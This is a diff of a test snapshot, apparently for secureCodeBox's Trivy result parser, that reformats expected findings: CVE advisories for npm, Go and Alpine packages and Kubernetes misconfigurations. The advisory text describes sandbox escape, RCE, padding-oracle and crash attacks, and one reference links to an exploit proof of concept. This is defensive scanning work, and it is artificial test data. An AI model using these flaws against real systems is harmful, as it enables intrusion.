-", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -38968,10 +39044,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39129,10 +39207,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39290,10 +39370,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39451,10 +39533,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39612,10 +39696,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39773,10 +39859,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39934,10 +40022,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -40095,10 +40185,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -40658,9 +40750,11 @@ console.log(clean); "vulnerabilityId": "CVE-2022-0355", }, "category": "NPM Package Vulnerability", - "description": "Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. + "description": +"Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package simple-get to the fixed version: 4.0.1, 3.1.1, 2.8.2 or remove the package from the image.", "name": "simple-get: exposure of sensitive information to an unauthorized actor", @@ -40735,8 +40829,10 @@ console.log(clean); "vulnerabilityId": "CVE-2024-38355", }, "category": "NPM Package Vulnerability", - "description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. -", + "description": +"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package socket.io to the fixed version: 2.5.1, 4.6.2 or remove the package from the image.", "name": "socket.io: Unhandled 'error' event", @@ -40878,9 +40974,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -41139,7 +41237,8 @@ console.log(clean); "vulnerabilityId": "GHSA-qrmm-w75w-3wpx", }, "category": "NPM Package Vulnerability", - "description": "SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. + "description": +"SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. However, this functionality may pose a risk for users who host their own SwaggerUI instances. In particular, including remote OpenAPI definitions opens a vector for phishing attacks by abusing the trusted names/domains of self-hosted instances. @@ -41189,7 +41288,8 @@ Through the exploration of this issue, it became apparent that users may not be ## Reflected XSS attack **Warning** in versions < 3.38.0, it is possible to combine the URL options (as mentioned above) with a vulnerability in DOMPurify (https://www.cvedetails.com/cve/CVE-2020-26870/) to create a reflected XSS vector. If your version of Swagger UI is older than 3.38.0, we suggest you upgrade or implement the workaround as mentioned above. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package swagger-ui-dist to the fixed version: 4.1.3 or remove the package from the image.", "name": "Server side request forgery in SwaggerUI", @@ -42190,11 +42290,13 @@ Through the exploration of this issue, it became apparent that users may not be "vulnerabilityId": "GHSA-xx4c-jj58-r7x6", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact Versions of \`validator\` prior to 13.7.0 are affected by an inefficient Regular Expression complexity when using the \`rtrim\` and \`trim\` sanitizers. ### Patches -The problem has been patched in validator 13.7.0", +The problem has been patched in validator 13.7.0" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package validator to the fixed version: 13.7.0 or remove the package from the image.", "name": "Inefficient Regular Expression Complexity in Validator.js", @@ -42587,8 +42689,10 @@ The problem has been patched in validator 13.7.0", "vulnerabilityId": "CVE-2023-29199", }, "category": "NPM Package Vulnerability", - "description": "There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass \`handleException()\` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version \`3.9.16\` of \`vm2\`. -", + "description": +"There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass \`handleException()\` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version \`3.9.16\` of \`vm2\`. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package vm2 to the fixed version: 3.9.16 or remove the package from the image.", "name": "vm2: Sandbox Escape", @@ -42999,9 +43103,11 @@ The problem has been patched in validator 13.7.0", "vulnerabilityId": "CVE-2023-26115", }, "category": "NPM Package Vulnerability", - "description": "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. + "description": +"All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package word-wrap to the fixed version: 1.2.4 or remove the package from the image.", "name": "word-wrap: ReDoS", @@ -44314,11 +44420,13 @@ exports[`parses securecodebox:master result file into findings 1`] = ` "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -44675,11 +44783,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -45114,11 +45224,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -45475,11 +45587,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -46358,11 +46472,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -46956,5707 +47072,5681 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P ] `; -exports[`should parse a trivy-k8s scan result 1`] = ` +exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox itself 1`] = ` [ { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.10.7-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-36159", + "installedVersion": "2.10.5-r1", + "packageName": "apk-tools", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", + "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", + "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\\0' terminator one byte too late.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Finding in Dependency apk-tools (2.10.5-r1)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2021-36159", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.10.6-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-30139", + "installedVersion": "2.10.5-r1", + "packageName": "apk-tools", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Finding in Dependency apk-tools (2.10.5-r1)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2021-30139", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + }, + { + "type": "URL", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.40.54", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "1.31.1-r20", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-28831", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "https://access.redhat.com/security/cve/CVE-2021-28831", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "https://security.gentoo.org/glsa/202105-09", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://ubuntu.com/security/notices/USN-5179-2", + "https://www.cve.org/CVERecord?id=CVE-2021-28831", ], }, "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "name": "busybox: invalid free or segmentation fault via malformed gzip data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://avd.aquasec.com/nvd/cve-2021-28831", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "https://access.redhat.com/security/cve/CVE-2021-28831", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": 